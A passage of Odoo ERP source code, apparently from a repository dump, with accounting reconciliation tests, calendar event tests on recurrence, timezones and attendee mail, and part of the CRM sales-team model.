'amount_currency': 5301.00,
})
aml_obj.create({
'name': 'TaxLine',
'account_id': self.tax_waiting_account.id,
'debit': 17094.66,
'move_id': purchase_move.id,
'tax_line_id': self.tax_cash_basis.id,
'currency_id': self.currency_usd_id,
'amount_currency': 848.16,
})
purchase_payable_line0 = aml_obj.create({
'name': 'Payable',
'account_id': self.account_rsa.id,
'credit': 123936.31,
'move_id': purchase_move.id,
'currency_id': self.currency_usd_id,
'amount_currency': -6149.16,
})
purchase_move.post()
# FX 01 Move
fx_move_01 = self.env['account.move'].create({
'name': 'FX 01',
'journal_id': self.fx_journal.id,
})
fx_01_payable_line = aml_obj.create({
'account_id': self.account_rsa.id,
'credit': 1572.96,
'move_id': fx_move_01.id,
'currency_id': self.currency_usd_id,
'amount_currency': 0.00,
})
aml_obj.create({
'account_id': self.diff_expense_account.id,
'debit': 1572.96,
'move_id': fx_move_01.id,
'currency_id': self.currency_usd_id,
'amount_currency': 0.00,
})
fx_move_01.post()
# FX 02 Move
fx_move_02 = self.env['account.move'].create({
'name': 'FX 02',
'journal_id': self.fx_journal.id,
})
fx_02_payable_line = aml_obj.create({
'account_id': self.account_rsa.id,
'debit': 1740.82,
'move_id': fx_move_02.id,
'currency_id': self.currency_usd_id,
'amount_currency': 0.00,
})
aml_obj.create({
'account_id': self.diff_income_account.id,
'credit': 1740.82,
'move_id': fx_move_02.id,
'currency_id': self.currency_usd_id,
'amount_currency': 0.00,
})
fx_move_02.post()
# Payment Move
payment_move = self.env['account.move'].create({
'name': 'payment',
'journal_id': self.bank_journal_usd.id,
})
payment_payable_line = aml_obj.create({
'account_id': self.account_rsa.id,
'debit': 123768.45,
'move_id': payment_move.id,
'currency_id': self.currency_usd_id,
'amount_currency': 6149.16,
})
aml_obj.create({
'account_id': self.account_usd.id,
'credit': 123768.45,
'move_id': payment_move.id,
'currency_id': self.currency_usd_id,
'amount_currency': -6149.16,
})
payment_move.post()
to_reconcile = (
(purchase_move + payment_move + fx_move_01 + fx_move_02)
.mapped('line_ids')
.filtered(lambda l: l.account_id.internal_type == 'payable'))
to_reconcile.reconcile()
# check reconciliation in Payable account
self.assertTrue(purchase_payable_line0.full_reconcile_id.exists())
self.assertEqual(
purchase_payable_line0.full_reconcile_id.reconciled_line_ids,
purchase_payable_line0 + fx_01_payable_line + fx_02_payable_line +
payment_payable_line)
# check cash basis
cash_basis_moves = self.env['account.move'].search(
[('journal_id', '=', self.cash_basis_journal.id)])
self.assertEqual(len(cash_basis_moves), 1)
cash_basis_aml_ids = cash_basis_moves.mapped('line_ids')
self.assertEqual(len(cash_basis_aml_ids), 4)
# check amounts
cash_basis_move1 = cash_basis_moves.filtered(
lambda m: m.amount == 123936.31)
self.assertTrue(cash_basis_move1.exists())
# For first move
move_lines = cash_basis_move1.line_ids
base_amount_tax_lines = move_lines.filtered(
lambda l: l.account_id == self.tax_base_amount_account)
self.assertEqual(len(base_amount_tax_lines), 2)
self.assertAlmostEqual(
sum(base_amount_tax_lines.mapped('credit')), 106841.65)
self.assertAlmostEqual(
sum(base_amount_tax_lines.mapped('debit')), 106841.65)
self.assertAlmostEqual(
(move_lines - base_amount_tax_lines)
.filtered(lambda l: l.account_id == self.tax_waiting_account)
.credit, 17094.66)
self.assertAlmostEqual(
(move_lines - base_amount_tax_lines)
.filtered(lambda l: l.account_id == self.tax_final_account)
.debit, 17094.66)
def test_reconciliation_cash_basis_revert(self):
company = self.env.ref('base.main_company')
company.tax_cash_basis_journal_id = self.cash_basis_journal
tax_cash_basis10percent = self.tax_cash_basis.copy({'amount': 10})
self.tax_waiting_account.reconcile = True
tax_waiting_account10 = self.tax_waiting_account.copy({
'name': '<NAME>',
'code': 'TWAIT1',
})
AccountMoveLine = self.env['account.move.line'].with_context(check_move_validity=False)
# Purchase
purchase_move = self.env['account.move'].create({
'name': 'invoice',
'journal_id': self.purchase_journal.id,
})
purchase_payable_line0 = AccountMoveLine.create({
'account_id': self.account_rsa.id,
'credit': 175,
'move_id': purchase_move.id,
})
AccountMoveLine.create({
'name': 'expenseTaxed 10%',
'account_id': self.expense_account.id,
'debit': 50,
'move_id': purchase_move.id,
'tax_ids': [(4, tax_cash_basis10percent.id, False)],
})
tax_line0 = AccountMoveLine.create({
'name': 'TaxLine0',
'account_id': tax_waiting_account10.id,
'debit': 5,
'move_id': purchase_move.id,
'tax_line_id': tax_cash_basis10percent.id,
})
AccountMoveLine.create({
'name': 'expenseTaxed 20%',
'account_id': self.expense_account.id,
'debit': 100,
'move_id': purchase_move.id,
'tax_ids': [(4, self.tax_cash_basis.id, False)],
})
tax_line1 = AccountMoveLine.create({
'name': 'TaxLine1',
'account_id': self.tax_waiting_account.id,
'debit': 20,
'move_id': purchase_move.id,
'tax_line_id': self.tax_cash_basis.id,
})
purchase_move.post()
reverted = self.env['account.move'].browse(purchase_move.reverse_moves())
self.assertTrue(reverted.exists())
for inv_line in [purchase_payable_line0, tax_line0, tax_line1]:
self.assertTrue(inv_line.full_reconcile_id.exists())
reverted_expected = reverted.line_ids.filtered(lambda l: l.account_id == inv_line.account_id)
self.assertEqual(len(reverted_expected), 1)
self.assertEqual(reverted_expected.full_reconcile_id, inv_line.full_reconcile_id)
def test_reconciliation_cash_basis_foreign_currency_low_values(self):
journal = self.env['account.journal'].create({
'name': 'Bank', 'type': 'bank', 'code': 'THE',
'currency_id': self.currency_usd_id,
})
usd = self.env['res.currency'].browse(self.currency_usd_id)
usd.rate_ids.unlink()
self.env['res.currency.rate'].create({
'name': time.strftime('%Y-01-01'),
'rate': 1/17.0,
'currency_id': self.currency_usd_id,
'company_id': self.env.ref('base.main_company').id,
})
invoice = self.create_invoice(
type='out_invoice', invoice_amount=50,
currency_id=self.currency_usd_id)
invoice.journal_id.update_posted = True
invoice.action_cancel()
invoice.state = 'draft'
invoice.invoice_line_ids.write({
'invoice_line_tax_ids': [(6, 0, [self.tax_cash_basis.id])]})
invoice.compute_taxes()
invoice.action_invoice_open()
self.assertTrue(invoice.currency_id != self.env.user.company_id.currency_id)
# First Payment
payment0 = self.make_payment(invoice, journal, invoice.amount_total - 0.01)
self.assertEqual(invoice.residual, 0.01)
tax_waiting_line = invoice.move_id.line_ids.filtered(lambda l: l.account_id == self.tax_waiting_account)
self.assertFalse(tax_waiting_line.reconciled)
move_caba0 = tax_waiting_line.matched_debit_ids.debit_move_id.move_id
self.assertTrue(move_caba0.exists())
self.assertEqual(move_caba0.journal_id, self.env.user.company_id.tax_cash_basis_journal_id)
pay_receivable_line0 = payment0.move_line_ids.filtered(lambda l: l.account_id == self.account_rcv)
self.assertTrue(pay_receivable_line0.reconciled)
self.assertEqual(pay_receivable_line0.matched_debit_ids, move_caba0.tax_cash_basis_rec_id)
# Second Payment
payment1 = self.make_payment(invoice, journal, 0.01)
self.assertEqual(invoice.residual, 0)
self.assertEqual(invoice.state, 'paid')
self.assertTrue(tax_waiting_line.reconciled)
move_caba1 = tax_waiting_line.matched_debit_ids.mapped('debit_move_id').mapped('move_id').filtered(lambda m: m != move_caba0)
self.assertEqual(len(move_caba1.exists()), 1)
self.assertEqual(move_caba1.journal_id, self.env.user.company_id.tax_cash_basis_journal_id)
pay_receivable_line1 = payment1.move_line_ids.filtered(lambda l: l.account_id == self.account_rcv)
self.assertTrue(pay_receivable_line1.reconciled)
self.assertEqual(pay_receivable_line1.matched_debit_ids, move_caba1.tax_cash_basis_rec_id)
def test_reconciliation_with_currency(self):
#reconciliation on an account having a foreign currency being
#the same as the company one
account_rcv = self.account_rcv
account_rcv.currency_id = self.currency_euro_id
aml_obj = self.env['account.move.line'].with_context(
check_move_validity=False)
general_move1 = self.env['account.move'].create({
'name': 'general1',
'journal_id': self.general_journal.id,
})
aml_obj.create({
'name': 'debit1',
'account_id': account_rcv.id,
'debit': 11,
'move_id': general_move1.id,
})
aml_obj.create({
'name': 'credit1',
'account_id': self.account_rsa.id,
'credit': 11,
'move_id': general_move1.id,
})
general_move1.post()
general_move2 = self.env['account.move'].create({
'name': 'general2',
'journal_id': self.general_journal.id,
})
aml_obj.create({
'name': 'credit2',
'account_id': account_rcv.id,
'credit': 10,
'move_id': general_move2.id,
})
aml_obj.create({
'name': 'debit2',
'account_id': self.account_rsa.id,
'debit': 10,
'move_id': general_move2.id,
})
general_move2.post()
general_move3 = self.env['account.move'].create({
'name': 'general3',
'journal_id': self.general_journal.id,
})
aml_obj.create({
'name': 'credit3',
'account_id': account_rcv.id,
'credit': 1,
'move_id': general_move3.id,
})
aml_obj.create({
'name': 'debit3',
'account_id': self.account_rsa.id,
'debit': 1,
'move_id': general_move3.id,
})
general_move3.post()
to_reconcile = ((general_move1 + general_move2 + general_move3)
.mapped('line_ids')
.filtered(lambda l: l.account_id.id == account_rcv.id))
to_reconcile.reconcile()
for aml in to_reconcile:
self.assertEqual(aml.amount_residual, 0.0)
def test_inv_refund_foreign_payment_writeoff_domestic2(self):
company = self.env.ref('base.main_company')
self.env['res.currency.rate'].search([]).unlink()
self.env['res.currency.rate'].create({
'name': time.strftime('%Y') + '-07-01',
'rate': 1.0,
'currency_id': self.currency_euro_id,
'company_id': company.id
})
self.env['res.currency.rate'].create({
'name': time.strftime('%Y') + '-07-01',
'rate': 1.110600, # Don't change this !
'currency_id': self.currency_usd_id,
'company_id': self.env.ref('base.main_company').id
})
inv1 = self.create_invoice(invoice_amount=800, currency_id=self.currency_usd_id)
inv2 = self.create_invoice(type="out_refund", invoice_amount=400, currency_id=self.currency_usd_id)
payment = self.env['account.payment'].create({
'payment_method_id': self.inbound_payment_method.id,
'payment_type': 'inbound',
'partner_type': 'customer',
'partner_id': inv1.partner_id.id,
'amount': 200.00,
'journal_id': self.bank_journal_euro.id,
'company_id': company.id,
})
payment.post()
inv1_receivable = inv1.move_id.line_ids.filtered(lambda l: l.account_id.internal_type == 'receivable')
inv2_receivable = inv2.move_id.line_ids.filtered(lambda l: l.account_id.internal_type == 'receivable')
pay_receivable = payment.move_line_ids.filtered(lambda l: l.account_id.internal_type == 'receivable')
move_balance = self.env['account.move'].create({
'partner_id': inv1.partner_id.id,
'date': time.strftime('%Y') + '-07-01',
'journal_id': self.bank_journal_euro.id,
'line_ids': [
(0, False, {'credit': 160.16, 'account_id': inv1_receivable.account_id.id, 'name': 'Balance WriteOff'}),
(0, False, {'debit': 160.16, 'account_id': self.diff_expense_account.id, 'name': 'Balance WriteOff'}),
]
})
move_balance.post()
move_balance_receiv = move_balance.line_ids.filtered(lambda l: l.account_id.internal_type == 'receivable')
(inv1_receivable + inv2_receivable + pay_receivable + move_balance_receiv).reconcile()
self.assertTrue(inv1_receivable.full_reconcile_id.exists())
self.assertEquals(inv1_receivable.full_reconcile_id, inv2_receivable.full_reconcile_id)
self.assertEquals(inv1_receivable.full_reconcile_id, pay_receivable.full_reconcile_id)
self.assertEquals(inv1_receivable.full_reconcile_id, move_balance_receiv.full_reconcile_id)
self.assertTrue(inv1.reconciled)
self.assertTrue(inv2.reconciled)
self.assertEquals(inv1.state, 'paid')
self.assertEquals(inv2.state, 'paid')
```
#### File: calendar/tests/test_calendar.py
```python
import datetime
from datetime import datetime, timedelta, time
from odoo import fields
from odoo.tests.common import TransactionCase
import pytz
import re
class TestCalendar(TransactionCase):
def setUp(self):
super(TestCalendar, self).setUp()
self.CalendarEvent = self.env['calendar.event']
# In Order to test calendar, I will first create One Simple Event with real data
self.event_tech_presentation = self.CalendarEvent.create({
'privacy': 'private',
'start': '2011-04-30 16:00:00',
'stop': '2011-04-30 18:30:00',
'description': 'The Technical Presentation will cover following topics:\n* Creating Odoo class\n* Views\n* Wizards\n* Workflows',
'duration': 2.5,
'location': 'Odoo S.A.',
'name': 'Technical Presentation'
})
def test_calender_simple_event(self):
m = self.CalendarEvent.create({
'name': "Test compute",
'start': '2017-07-12 14:30:00',
'allday': False,
'stop': '2017-07-12 15:00:00',
})
self.assertEqual(
(str(m.start_datetime), str(m.stop_datetime)),
(u'2017-07-12 14:30:00', u'2017-07-12 15:00:00'),
"Sanity check"
)
def test_calender_event(self):
# Now I will set recurrence for this event to occur monday and friday of week
data = {
'fr': 1,
'mo': 1,
'interval': 1,
'rrule_type': 'weekly',
'end_type': 'end_date',
'final_date': '2011-05-31 00:00:00',
'recurrency': True
}
self.event_tech_presentation.write(data)
# In order to check that recurrent events are views successfully in calendar view, I will open calendar view of events|
self.CalendarEvent.fields_view_get(False, 'calendar')
# In order to check that recurrent events are views successfully in calendar view, I will search for one of the recurrent event and count the number of events
rec_events = self.CalendarEvent.with_context({'virtual_id': True}).search([
('start', '>=', '2011-04-30 16:00:00'), ('start', '<=', '2011-05-31 00:00:00')
])
self.assertEqual(len(rec_events), 9, 'Wrong number of events found')
# Now I move a virtual event, to see that a real event is well created and depending from the native recurrence
before = self.CalendarEvent.with_context({'virtual_id': False}).search([
('start', '>=', '2011-04-30 16:00:00'), ('start', '<=', '2011-05-31 00:00:00')
])
# We start by detach the event
newevent = rec_events[1].detach_recurring_event()
newevent.with_context({'virtual_id': True}).write({'name': '<NAME>', 'recurrency': True})
after = self.CalendarEvent.with_context({'virtual_id': False}).search([
('start', '>=', '2011-04-30 16:00:00'), ('start', '<=', '2011-05-31 00:00:00')
])
self.assertEqual(len(after), len(before) + 1, 'Wrong number of events found, after to have moved a virtual event')
new_event = after - before
self.assertEqual(new_event[0].recurrent_id, before.id, 'Recurrent_id not correctly passed to the new event')
# Now I will test All day event
allday_event = self.CalendarEvent.create({
'allday': 1,
'privacy': 'confidential',
'start': '2011-04-30 00:00:00',
'stop': '2011-04-30 00:00:00',
'description': 'All day technical test',
'location': 'School',
'name': 'All day test event'
})
# In order to check reminder I will first create reminder
res_alarm_day_before_event_starts = self.env['calendar.alarm'].create({
'name': '1 Day before event starts',
'duration': 1,
'interval': 'days',
'type': 'notification'
})
# Now I will assign this reminder to all day event|
allday_event.write({'alarm_ids': [(6, 0, [res_alarm_day_before_event_starts.id])]})
# I create a recuring rule for my event
calendar_event_sprint_review = self.CalendarEvent.create({
'name': 'Begin of month meeting',
'start': datetime.combine(fields.Date.today(), time(12, 0)),
'stop': datetime.combine(fields.Date.today(), time(18, 0)),
'recurrency': True,
'rrule': 'FREQ=MONTHLY;INTERVAL=1;COUNT=12;BYDAY=1MO'
})
# I check that the attributes are set correctly
self.assertEqual(calendar_event_sprint_review.rrule_type, 'monthly', 'rrule_type should be mothly')
self.assertEqual(calendar_event_sprint_review.count, 12, 'rrule_type should be mothly')
self.assertEqual(calendar_event_sprint_review.month_by, 'day', 'rrule_type should be mothly')
self.assertEqual(calendar_event_sprint_review.byday, '1', 'rrule_type should be mothly')
self.assertEqual(calendar_event_sprint_review.week_list, 'MO', 'rrule_type should be mothly')
def test_validation_error(self):
"""
Ideally this should build the base event in such a way that calling
write() triggers detach_recurring_event, but I've no idea how that
actually works so just calling it directly for now
"""
m = self.CalendarEvent.create({
'name': "wheee",
'start': '2017-07-12 14:30:00',
'allday': False,
'rrule': u'FREQ=WEEKLY;BYDAY=WE;INTERVAL=1;COUNT=100',
'duration': 0.5,
'stop': '2017-07-12 15:00:00',
})
self.assertEqual(
(str(m.start_datetime), str(m.stop_datetime)),
(u'2017-07-12 14:30:00', u'2017-07-12 15:00:00'),
"Sanity check"
)
values = {
'allday': False,
'name': u'wheee',
'attendee_ids': [
(0, 0, {'state': u'needsAction', 'partner_id': 8, 'email': u'<EMAIL>'}),
(0, 0, {'state': u'needsAction', 'partner_id': 10, 'email': u'<EMAIL>'}),
],
'recurrency': True,
'privacy': u'public',
'stop': '2017-07-10 16:00:00',
'alarm_ids': [(6, 0, [])],
'start': '2017-07-10 15:30:00',
'location': u"XXX",
'duration': 0.5,
'partner_ids': [(4, 10), (4, 8)],
'description': u"A thing"
}
records = m.detach_recurring_event(values)
self.assertEqual(
(str(m.start_datetime), str(m.stop_datetime)),
('2017-07-12 14:30:00', u'2017-07-12 15:00:00'),
)
self.assertEquals(
(str(records.start_datetime), str(records.stop_datetime)),
(u'2017-07-10 15:30:00', u'2017-07-10 16:00:00'),
)
def test_event_order(self):
""" check the ordering of events when searching """
def create_event(name, date):
return self.CalendarEvent.create({
'name': name,
'start': date + ' 12:00:00',
'stop': date + ' 14:00:00',
'duration': 2.0,
})
foo1 = create_event('foo', '2011-04-01')
foo2 = create_event('foo', '2011-06-01')
bar1 = create_event('bar', '2011-05-01')
bar2 = create_event('bar', '2011-06-01')
domain = [('id', 'in', (foo1 + foo2 + bar1 + bar2).ids)]
# sort them by name only
events = self.CalendarEvent.search(domain, order='name')
self.assertEqual(events.mapped('name'), ['bar', 'bar', 'foo', 'foo'])
events = self.CalendarEvent.search(domain, order='name desc')
self.assertEqual(events.mapped('name'), ['foo', 'foo', 'bar', 'bar'])
# sort them by start date only
events = self.CalendarEvent.search(domain, order='start')
self.assertEqual(events.mapped('start'), (foo1 + bar1 + foo2 + bar2).mapped('start'))
events = self.CalendarEvent.search(domain, order='start desc')
self.assertEqual(events.mapped('start'), (foo2 + bar2 + bar1 + foo1).mapped('start'))
# sort them by name then start date
events = self.CalendarEvent.search(domain, order='name asc, start asc')
self.assertEqual(list(events), [bar1, bar2, foo1, foo2])
events = self.CalendarEvent.search(domain, order='name asc, start desc')
self.assertEqual(list(events), [bar2, bar1, foo2, foo1])
events = self.CalendarEvent.search(domain, order='name desc, start asc')
self.assertEqual(list(events), [foo1, foo2, bar1, bar2])
events = self.CalendarEvent.search(domain, order='name desc, start desc')
self.assertEqual(list(events), [foo2, foo1, bar2, bar1])
# sort them by start date then name
events = self.CalendarEvent.search(domain, order='start asc, name asc')
self.assertEqual(list(events), [foo1, bar1, bar2, foo2])
events = self.CalendarEvent.search(domain, order='start asc, name desc')
self.assertEqual(list(events), [foo1, bar1, foo2, bar2])
events = self.CalendarEvent.search(domain, order='start desc, name asc')
self.assertEqual(list(events), [bar2, foo2, bar1, foo1])
events = self.CalendarEvent.search(domain, order='start desc, name desc')
self.assertEqual(list(events), [foo2, bar2, bar1, foo1])
def test_event_activity(self):
# ensure meeting activity type exists
meeting_act_type = self.env['mail.activity.type'].search([('category', '=', 'meeting')], limit=1)
if not meeting_act_type:
meeting_act_type = self.env['mail.activity.type'].create({
'name': 'Meeting Test',
'category': 'meeting',
})
# have a test model inheriting from activities
test_record = self.env['res.partner'].create({
'name': 'Test',
})
now = datetime.now()
test_user = self.env.ref('base.user_demo')
test_name, test_description, test_description2 = 'Test-Meeting', '<p>Test-Description</p>', '<p>NotTest</p>'
# create using default_* keys
test_event = self.env['calendar.event'].sudo(test_user).with_context(
default_res_model=test_record._name,
default_res_id=test_record.id,
).create({
'name': test_name,
'description': test_description,
'start': fields.Datetime.to_string(now + timedelta(days=-1)),
'stop': fields.Datetime.to_string(now + timedelta(hours=2)),
'user_id': self.env.user.id,
})
self.assertEqual(test_event.res_model, test_record._name)
self.assertEqual(test_event.res_id, test_record.id)
self.assertEqual(len(test_record.activity_ids), 1)
self.assertEqual(test_record.activity_ids.summary, test_name)
self.assertEqual(test_record.activity_ids.note, test_description)
self.assertEqual(test_record.activity_ids.user_id, self.env.user)
self.assertEqual(test_record.activity_ids.date_deadline, (now + timedelta(days=-1)).date())
# updating event should update activity
test_event.write({
'name': '%s2' % test_name,
'description': test_description2,
'start': fields.Datetime.to_string(now + timedelta(days=-2)),
'user_id': test_user.id,
})
self.assertEqual(test_record.activity_ids.summary, '%s2' % test_name)
self.assertEqual(test_record.activity_ids.note, test_description2)
self.assertEqual(test_record.activity_ids.user_id, test_user)
self.assertEqual(test_record.activity_ids.date_deadline, (now + timedelta(days=-2)).date())
# deleting meeting should delete its activity
test_record.activity_ids.unlink()
self.assertEqual(self.env['calendar.event'], self.env['calendar.event'].search([('name', '=', test_name)]))
# create using active_model keys
test_event = self.env['calendar.event'].sudo(self.env.ref('base.user_demo')).with_context(
active_model=test_record._name,
active_id=test_record.id,
).create({
'name': test_name,
'description': test_description,
'start': now + timedelta(days=-1),
'stop': now + timedelta(hours=2),
'user_id': self.env.user.id,
})
self.assertEqual(test_event.res_model, test_record._name)
self.assertEqual(test_event.res_id, test_record.id)
self.assertEqual(len(test_record.activity_ids), 1)
def test_event_allday(self):
self.env.user.tz = 'Pacific/Honolulu'
event = self.CalendarEvent.create({
'name': '<NAME>',
'start': "2018-10-16 00:00:00",
'start_date': "2018-10-16",
'start_datetime': False,
'stop': "2018-10-18 00:00:00",
'stop_date': "2018-10-18",
'stop_datetime': False,
'allday': True,
})
self.assertEqual(str(event.start), '2018-10-16 08:00:00')
self.assertEqual(str(event.stop), '2018-10-18 18:00:00')
def test_recurring_around_dst(self):
m = self.CalendarEvent.create({
'name': "wheee",
'start': '2018-10-27 14:30:00',
'allday': False,
'rrule': u'FREQ=DAILY;INTERVAL=1;COUNT=4',
'duration': 2,
'stop': '2018-10-27 16:30:00',
})
start_recurring_dates = m.with_context({'tz': 'Europe/Brussels'})._get_recurrent_date_by_event()
self.assertEqual(len(start_recurring_dates), 4)
for d in start_recurring_dates:
self.assertEqual(d.tzinfo, pytz.UTC)
if d.day < 28: # DST switch happens between 2018-10-27 and 2018-10-28
self.assertEqual(d.hour, 14)
else:
self.assertEqual(d.hour, 15)
self.assertEqual(d.minute, 30)
def test_event_activity_timezone(self):
activty_type = self.env['mail.activity.type'].create({
'name': 'Meeting',
'category': 'meeting'
})
activity_id = self.env['mail.activity'].create({
'summary': 'Meeting with partner',
'activity_type_id': activty_type.id,
'res_model_id': self.env['ir.model'].search([('model', '=', 'res.partner')], limit=1).id,
'res_id': self.env['res.partner'].search([('name', 'ilike', 'Deco Addict')], limit=1).id,
})
calendar_event = self.env['calendar.event'].create({
'name': 'Meeting with partner',
'activity_ids': [(6, False, activity_id.ids)],
'start': '2018-11-12 21:00:00',
'stop': '2018-11-13 00:00:00',
})
# Check output in UTC
self.assertEqual(str(activity_id.date_deadline), '2018-11-12')
# Check output in the user's tz
# write on the event to trigger sync of activities
calendar_event.with_context({'tz': 'Australia/Brisbane'}).write({
'start': '2018-11-12 21:00:00',
})
self.assertEqual(str(activity_id.date_deadline), '2018-11-13')
def test_event_allday_activity_timezone(self):
# Covers use case of commit eef4c3b48bcb4feac028bf640b545006dd0c9b91
# Also, read the comment in the code at calendar.event._inverse_dates
activty_type = self.env['mail.activity.type'].create({
'name': 'Meeting',
'category': 'meeting'
})
activity_id = self.env['mail.activity'].create({
'summary': 'Meeting with partner',
'activity_type_id': activty_type.id,
'res_model_id': self.env['ir.model'].search([('model', '=', 'res.partner')], limit=1).id,
'res_id': self.env['res.partner'].search([('name', 'ilike', '<NAME>')], limit=1).id,
})
calendar_event = self.env['calendar.event'].create({
'name': '<NAME>',
'start': "2018-10-16 00:00:00",
'start_date': "2018-10-16",
'start_datetime': False,
'stop': "2018-10-18 00:00:00",
'stop_date': "2018-10-18",
'stop_datetime': False,
'allday': True,
'activity_ids': [(6, False, activity_id.ids)],
})
# Check output in UTC
self.assertEqual(str(activity_id.date_deadline), '2018-10-16')
# Check output in the user's tz
# write on the event to trigger sync of activities
calendar_event.with_context({'tz': 'Pacific/Honolulu'}).write({
'start': '2018-10-16 00:00:00',
'start_date': '2018-10-16',
})
self.assertEqual(str(activity_id.date_deadline), '2018-10-16')
def test_event_creation_mail(self):
"""
Check that mail are sent to the attendees on event creation
Check that mail are sent to the added attendees on event edit
Check that mail are NOT sent to the attendees when detaching a recurring event
"""
def _test_one_mail_per_attendee(self, m, partners):
# check that every attendee receive a (single) mail for the event
for partner in partners:
mail = self.env['mail.mail'].search([
('recipient_ids', 'in', partner.id),
('subject', 'like', m.name),
])
self.assertEqual(len(mail), 1)
partners = [
self.env['res.partner'].create({'name':'testuser0','email': u'<EMAIL>'}),
self.env['res.partner'].create({'name':'testuser1','email': u'<EMAIL>'}),
]
partner_ids = [(6, False, [p.id for p in partners]),]
now = fields.Datetime.now()
m = self.CalendarEvent.create({
'name': "mailTest1",
'allday': False,
'rrule': u'FREQ=DAILY;INTERVAL=1;COUNT=5',
'duration': 0.5,
'partner_ids': partner_ids,
'start': fields.Datetime.to_string(now + timedelta(days=10)),
'stop': fields.Datetime.to_string(now + timedelta(days=15)),
})
# every partner should have 1 mail sent
_test_one_mail_per_attendee(self, m, partners)
# adding more partners to the event
partners.extend([
self.env['res.partner'].create({'name':'testuser2','email': u'<EMAIL>'}),
self.env['res.partner'].create({'name':'testuser3','email': u'<EMAIL>'}),
self.env['res.partner'].create({'name':'testuser4','email': u'<EMAIL>'}),
])
partner_ids = [(6, False, [p.id for p in partners]),]
m.write({'partner_ids': partner_ids})
# more email should be sent
_test_one_mail_per_attendee(self, m, partners)
# calculate virtualid to detach one event
virtid = str(m.id) + '-' + ''.join(re.split('[\D]', fields.Datetime.to_string(now + timedelta(days=12))))
# detaching a virtual event in the chain
self.env['calendar.event'].browse(virtid).detach_recurring_event(values={'active':False})
# since the detach actually create an event in the backend
# we check that no mail notifications are sent to the attendees
_test_one_mail_per_attendee(self, m, partners)
```
#### File: crm/models/crm_team.py
```python
from dateutil.relativedelta import relativedelta
from odoo import api, fields, models, _
from odoo.tools.safe_eval import safe_eval
from odoo.exceptions import ValidationError
class Team(models.Model):
_name = 'crm.team'
_inherit = ['mail.alias.mixin', 'crm.team']
_description = 'Sales Channels'
use_leads = fields.Boolean('Leads', help="Check this box to filter and qualify incoming requests as leads before converting them into opportunities and assigning them to a salesperson.")
use_opportunities = fields.Boolean('Pipeline', help="Check this box to manage a presales process with opportunities.")
alias_id = fields.Many2one('mail.alias', string='Alias', ondelete="restrict", required=True, help="The email address associated with this channel. New emails received will automatically create new leads assigned to the channel.")
unassigned_leads_count = fields.Integer(
compute='_compute_unassigned_leads_count',
string='Unassigned Leads', readonly=True)
opportunities_count = fields.Integer(
compute='_compute_opportunities',
string='Number of open opportunities', readonly=True)
opportunities_amount = fields.Integer(
compute='_compute_opportunities',
string='Opportunities Revenues', readonly=True)
dashboard_graph_model = fields.Selection(selection_add=[('crm.lead', 'Pipeline')])
dashboard_graph_period_pipeline = fields.Selection([
('week', 'Within a Week'),
('month', 'Within a Month'),
('year', 'Within a Year'),
], string='Expected to Close', help="The time period this channel's dashboard graph will consider.",
compute="_compute_dashboard_graph_period_pipeline", inverse="_inverse_dashboard_graph_period_pipeline")
dashboard_graph_group_pipeline = fields.Selection([
('day', 'Expected Closing Day'),
('week', 'Expected Closing Week'),
('month', 'Expected Closing Month'),
('user', 'Salesperson'),
('stage', 'Stage'),
], string='Grouping Method', default='day', help="How this channel's dashboard graph will group the results.")
def _compute_unassigned_leads_count(self):
leads_data = self.env['crm.lead'].read_group([
('team_id', 'in', self.ids),
('type', '=', 'lead'),
('user_id', '=', False),
], ['team_id'], ['team_id'])
counts = {datum['team_id'][0]: datum['team_id_count'] for datum in leads_data}
for team in self:
team.unassigned_leads_count = counts.get(team.id, 0)
def _compute_opportunities(self):
opportunity_data = self.env['crm.lead'].search([
('team_id', 'in', self.ids),
('probability', '<', 100),
('type', '=', 'opportunity'),
]).read(['planned_revenue', 'probability', 'team_id'])
counts = {}
amounts = {}
for datum in opportunity_data:
counts.setdefault(datum['team_id'][0], 0)
amounts.setdefault(datum['team_id'][0], 0)
counts[datum['team_id'][0]] += 1
amounts[datum['team_id'][0]] += (datum.get('planned_revenue', 0) * datum.get('probability', 0) / 100.0)
for team in self:
team.opportunities_count = counts.get(team.id, 0)
team.opportunities_amount = amounts.get(team.id, 0)
def _compute_dashboard_graph_period_pipeline(self):
for channel in self:
channel.dashboard_graph_period_pipeline = channel.dashboard_graph_period
def _inverse_dashboard_graph_period_pipeline(self):
for channel in self.filtered(lambda ch: ch.dashboard_graph_model == 'crm.lead'):
channel.dashboard_graph_period = channel.dashboard_graph_period_pipeline
def get_alias_model_name(self, vals):
return 'crm.lead'
def get_alias_values(self):
has_group_use_lead = self.env.user.has_group('crm.group_use_lead')
values = super(Team, self).get_alias_values()
values['alias_defaults'] = defaults = safe_eval(self.alias_defaults or "{}")
defaults['type'] = 'lead' if has_group_use_lead and self.use_leads else 'opportunity'
defaults['team_id'] = self.id
return values
@api.onchange('use_leads', 'use_opportunities')
def _onchange_use_leads_opportunities(self):
if not self.use_leads and not self.use_opportunities:
self.alias_name = False
if not self.use_opportunities and self.use_leads:
self.use_leads = False
@api.onchange('team_type')
def _onchange_team_type(self):
if self.team_type == 'sales':
self.use_opportunities = True
self.use_leads = lambda self: self.user_has_groups('crm.group_use_lead')
self.dashboard_graph_model = 'crm.lead'
else:
self.use_opportunities = False
self.use_leads = False
return super(Team, self)._onchange_team_type()
@api.onchange('dashboard_graph_model')
def _onchange_dashboard_graph_model(self):
if self.dashboard_graph_model == 'crm.lead':
self.dashboard_graph_period_pipeline = self.dashboard_graph_period
self.dashboard_graph_group_pipeline = self.dashboard_graph_group
else:
self.dashboard_graph_period = self.dashboard_graph_period_pipeline
if not self.dashboard_graph_group:
self.dashboard_graph_group = self._fields['dashboard_graph_group'].default(self)
@api.onchange('dashboard_graph_group_pipeline')
def _onchange_dashboard_graph_group_pipeline(self):
if self.dashboard_graph_group_pipeline == 'stage':
self.dashboard_graph_group = False
else:
self.dashboard_graph_group = self.dashboard_graph_group_pipeline
@api.constrains('dashboard_graph_model', 'use_opportunities')
def _check_graph_model(self):
if not self.use_opportunities and self.dashboard_graph_model == 'crm.lead':
raise ValidationError(_("You have to enable the Pipeline on your Sales Team to be able to set it as a content for the graph"))
@api.multi
def write(self, vals):
result = super(Team, self).write(vals)
if 'use_leads' in vals or 'alias_defaults' in vals:
for team in self:
team.alias_id.write(team.get_alias_values())
return result
#TODO JEM : refactor this stuff with xml action, proper customization,
@api.model
def action_your_pipeline(self):
action = self.env.ref('crm.crm_lead_opportunities_tree_view').read()[0]
user_team_id = self.env.user.sale_team_id.id
if not user_team_id:
user_team_id = self.search([], limit=1).id
